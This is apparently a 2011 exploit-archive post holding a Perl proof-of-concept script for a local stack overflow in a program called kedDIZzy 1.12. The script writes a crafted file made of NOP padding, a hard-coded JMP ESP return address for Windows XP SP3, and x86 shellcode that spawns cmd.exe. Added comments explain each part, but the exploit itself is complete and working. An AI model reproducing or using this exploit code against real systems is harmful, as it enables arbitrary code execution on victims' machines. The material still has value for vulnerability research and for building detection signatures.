ExploitFixes
[D] PERL : kedDIZzy 1.12 Local Stack Overflow [z] 2011-01-14 15:50:17
Posted by: kedans

=-=-=-=-=-=-=-={In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# [D] PERL : kedDIZzy 1.12 Local Stack Overflow [z]

# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com >

# Team : [D] HaCkErS-StreeT-Team [Z]

# + Allah Akbarr + Algerians HaCkErs

# Type : Perl

:::::::::::::::::::::::::(0x1a):::::::::::::::::::::::::::::::::::::::
#!/usr/bin/perl

#########################################################
## Usage-->>file created-->>load file-->>keddz.exe>>>BOOM!
#########################################################

#This Gap exploited By KedAns-Dz ** Converted From Ruby

# Console banner: title of the proof of concept, author and contact address,
# framed by two horizontal rules. Purely informational output.
my @banner_lines = (
    "-----------------------------------------------------",
    "[!] kedDIZzy 1.12 Local Stack Overflow",
    "",
    "[!] Author: KedAns-Dz",
    "",
    "[!] Mail: ked-h(at)hotmail(dot)com",
    "-----------------------------------------------------",
);
print "$_\n" for @banner_lines;
# Scalars for the pieces of the generated file: payload bytes, two filler
# runs, one 4-byte value, and the assembled output string.
my($ShellK,$nopk1,$nopk2,$jmpk,$PoC);
# Payload: 57 raw bytes (the author calls it the "shell"). The values
# 63 6D 64 2E 65 78 65 inside it are the ASCII characters of "cmd.exe", so it
# presumably starts a command interpreter -- NOTE(review): not disassembled
# here; confirm before relying on this.
# Near its end is the 4-byte value C7 93 BF 77, which looks like a hard-coded
# absolute address; if so, the payload is tied to one specific system build.
$ShellK =
"\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC".
"\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45".
"\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45".
"\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45".
"\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";

# Filler runs and the 4-byte control value.
# 284 bytes of 0x90 (the x86 NOP opcode). Presumably the distance to the
# overwritten control data in the target; the page does not show how the
# figure was obtained.
$nopk1 = "\x90" x 284;
# A second, 17-byte run of 0x90.
$nopk2 = "\x90" x 17;
# 4-byte value, 0x746E1873 when read little-endian. The author's comment
# describes it as a JMP ESP location in MSCTF.dll on Windows XP SP3. A fixed
# module address like this only holds where that exact DLL build is loaded at
# the same base (no ASLR) -- NOTE(review): not verified here.
$jmpk = "\x73\x18\x6E\x74" ; # win32/xp sp3 MSCTF.dll: JMP ESP
# This is one double-quoted string: the four variables are interpolated, and
# the spaces and periods between them are literal characters that are written
# to the file as well. Signatures derived from this sample should be taken
# from the bytes actually written, not from the variable order alone.
$PoC =" .$nopk1. .$jmpk. .$nopk2. .$ShellK.";

# B0oM!

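# Write the assembled string to keddz.exe in the current working directory.
# The original used a string as a symbolic filehandle name and ignored the
# results of open/print/close, so the success message below was printed even
# when nothing had been written. Each step is now checked and the script
# stops with the system error text on failure.
my $out_name = "keddz.exe";

open(my $out_fh, ">", $out_name)
    or die "Cannot open '$out_name' for writing: $!\n";

print {$out_fh} $PoC
    or die "Cannot write to '$out_name': $!\n";

# Buffered write errors only surface at close, so check that too.
close($out_fh)
    or die "Cannot close '$out_name': $!\n";

print "\nFile ' keddz.exe ' successfully created!\n";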

# By KedAns-Dz

:::::::::::::::::::::::::::::(0x2a):::::::::::::::::::::::::::::::::::::::

# [D] HaCkerS-StreeT-Team [Z]

-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --